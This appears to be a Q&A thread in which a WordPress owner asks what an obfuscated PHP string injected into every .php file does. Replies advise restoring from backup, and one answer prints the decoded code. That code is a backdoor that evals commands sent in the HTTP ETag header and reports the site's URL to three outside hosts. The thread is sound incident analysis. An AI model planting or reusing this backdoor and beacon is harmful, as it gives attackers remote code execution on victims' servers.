# Malicious encoded string in my wordpress site, what does it do?

Tags: php, security, code-injection

My site is not working at all, and I noticed that someone put this string on the top of all the .php files:

```
<?php /* b9cb27b481275ee07e304fa452b06754b499b5bf */ $u="p"."r"."e"."g"."_"."rep"."l"."ac"."e";$z="gzunc"."om"."press";$m="bas"."e"."64"."_dec"."ode";$u("/x"."wab"."z5/e",$z($m("eNrNVW"."1Po0AQ/"."i8mTfSDBLcslNwnrWj"."P86q2WHOfmgWGlpMuuEBr/737AnSx1XiX"."+3AJ"."Jcu8PDPz"."zMwW1iQ"."9ZmRTsTSCMIvg+CiuaFgmGe0hc3x+97S+zfmphwY9ZNFievv03ENDKbEe0qqHXHF2LmrJ02wkTv1L/iaMka10dHt9YRBnrIVKtjfcylSK5nuIsN2RoAv57MfAF7UFvmzjNSjSzqkl"."/mS8bC3Mf5l"."HB1"."mBNSL0SapSl7Gow2hrIwwwfxclS4F2WXclglun"."Ic30PE"."c"."/t7TUydiL3v"."8CgzudLO"."agV6P"."R3FTwLvV1PTrzHzSEi/P1VaUBIvHs"."NWtcbfJ"."Ot5RgqLNVD2XH4lD79O"."x2o9A06Owjlv+q6/95w1r2jR0q"."Z1G6Sv6UK/b4O1yym"."ucGffDZoB9O"."o8"."uHkmizw6CsG"."NUy03R"."JrHhPigJKFXw+9"."SYzb"."yJjO"."CPfv597/vk1P7exCI0U2iL9MWtZg"."Nc8"."5TceB2"."lvPwmIZOpIuoqbLiAF2Na8tS"."iqgA/cV2ILb9ys7"."C4ReTHOi"."2"."US1xW"."otNw6s2YFLOIS"."jL"."Dp9B0X2xa2Y4DAN"."JHjBpFtAsAgCAAHuMnVjBKRHvArXRC0+lp1enhX35xoFc+S7MBtj"."pZlyb"."fuvIeu+LMm"."eZHQKCFGxhb823jeBO"."RF6pCM0DUPGZAyoYslyfOEQ"."lEYCRVei"."zKvyg+9IC5PeZgwS7NFQk6BAltAmYTECLOVETAZ9/fmJW8Q6jKKZRXHqSq8"."Lagp0TLjJIU5B5qHGS2BlgU3VM3Js/y9k2QrJmkB6shn"."AMhKub5yCFEYNAAaUeI"."i4031NPkKymUWtRp+uPb8XeVAImC61vPJQnJhbm/80S8uMeqhBFo3tv2rFviN"."VdNhtLqf"."jDdiw3EoBtpFoOR7MFxmn5FggELXsSNrgOEs6AcBQY7VN8FyosC2ohBh7MY1Qif"."wH41sPX37KzS6m/pqhYz3+on38OhN/fnj5Lu24PVjCFg"."8ZPxHmxHfTfXR"."ycm3N+BnRcY=")),"/x"."wabz5/"."e"); /* f9d4b9453f919477fd0a13c96fe26367485b9689 */ ?>
```

What does this ^ do?

Right now I'm using the command "grep" to find all the infected files, but I'm not sure if I will be able to make my site work again only removing these strings from the .php files.

Comment: You should restore the most recent backup of your wordpress files.

Comment: It does bad things, and it usually does it in a way that bothering to decode that sucks up FAR more time than its worth. [I've done it] Restore from backup, apply patches, keep WP up to date *religiously*.

Comment: It's pretty pointless trying to clean up the files: your site is compromised, so even if you removed the infections, you're just immediately going to get hit again. You need to remove the site from the internet to stop infecting other people, then fix the compromise, then restore from known-good backups.

Comment: (It's unclear where the compromise came from, but if it's not a badly-installed and out-of-date WordPress, then another very common source is FTP access credentials leaked from a client machine infected with a trojan. In which case, scan all machines that have accessed FTP with multiple AVs, reinstall the OS on any that are found to be infected with anything, change all your passwords, and start using SFTP instead, as FTP is archaic, insecurity and broken.)

Answer (score 1):

FWIW, the following code seems to be eval'd, might have made a mistake along the way. Evil, but fascinating. Seems to have something to do with HTTP ETags.

```
function NAOWvLp ($nsSLWk, $Qlu) { 
    $QWVH = array(); 
    for ($iyJ=0; $iyJ<256; $iyJ++) { 
        $QWVH[$iyJ] = $iyJ; 
    } 
    $TRNh = 0; 
    for ($iyJ=0; $iyJ<256; $iyJ++) { 
        $TRNh = ($TRNh + $QWVH[$iyJ] + ord($nsSLWk[$iyJ % strlen($nsSLWk)])) % 256; 
        $HMynt = $QWVH[$iyJ]; 
        $QWVH[$iyJ] = $QWVH[$TRNh];
        $QWVH[$TRNh] = $HMynt; 
    } 
    $iyJ = 0; 
    $TRNh = 0; 
    $pvFu = ""; 
    for ($Nuwp=0; $Nuwp<strlen($Qlu); $Nuwp++) { 
        $iyJ = ($iyJ + 1) % 256; 
        $TRNh = ($TRNh + $QWVH[$iyJ]) % 256; 
        $HMynt = $QWVH[$iyJ]; 
        $QWVH[$iyJ] = $QWVH[$TRNh]; 
        $QWVH[$TRNh] = $HMynt; 
        $pvFu .= $Qlu[$Nuwp] ^ chr($QWVH[($QWVH[$iyJ] + $QWVH[$TRNh]) % 256]); 
    } 
    return $pvFu; 
} 

if (isset($_SERVER['HTTP_ETAG']) and 
    $glKV = explode(urldecode("+"), base64_decode(substr($_SERVER['HTTP_ETAG'], 5))) and 
    array_shift($glKV) == "4a9a5250737956456feeb00279bd60eee8bbe5b5") {
    die(eval(implode(urldecode("+"), $glKV)));
    $dmfVio = array("http://vapsindia.org/.kwbaq/","http://creatinghappiness.in/.gtput/","http://eft-psicologia-energetica.com.br/.kjwqp/"); 
    shuffle($dmfVio); 
    @file_get_contents(
        array_pop($dmfVio), 
        false, 
        stream_context_create(
            array(
                "http"=>array(
                            "method"=>"GET",
                            "header"=>"ETag: yJTHY"
                                      .base64_encode(
                                          NAOWvLp(
                                              "yJTHY", 
                                              "mPRNwu 5c b92e "
                                              .base64_encode(
                                                  "61ab82c976d485e1b3bba27430e47db64dc2559f "
                                                  .NAOWvLp(
                                                      "4a9a5250737956456feeb00279bd60eee8bbe5b5", 
                                                      $_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI']
                                                  )
                                              )
                                          )
                                      )."\r\n"
                        )
            )
        )
    );
}
```

Comment: Nice work on the decoding! It seems like it's using ETags to deliver the evil code to eval() `die(eval(implode(urldecode("+"), $glKV)));`.

I'm confused about the 2nd part which is making a `GET` request and sending back the server address/page URL via the ETag header to some server presumably under the owner's control. However, I thought `die()` always forced an exit. However, possibly if PHP has been patched to remove `eval()`, the `die()` line will be a syntax error/warning and PHP will continue to the next line, and report back to the control server not to try anymore?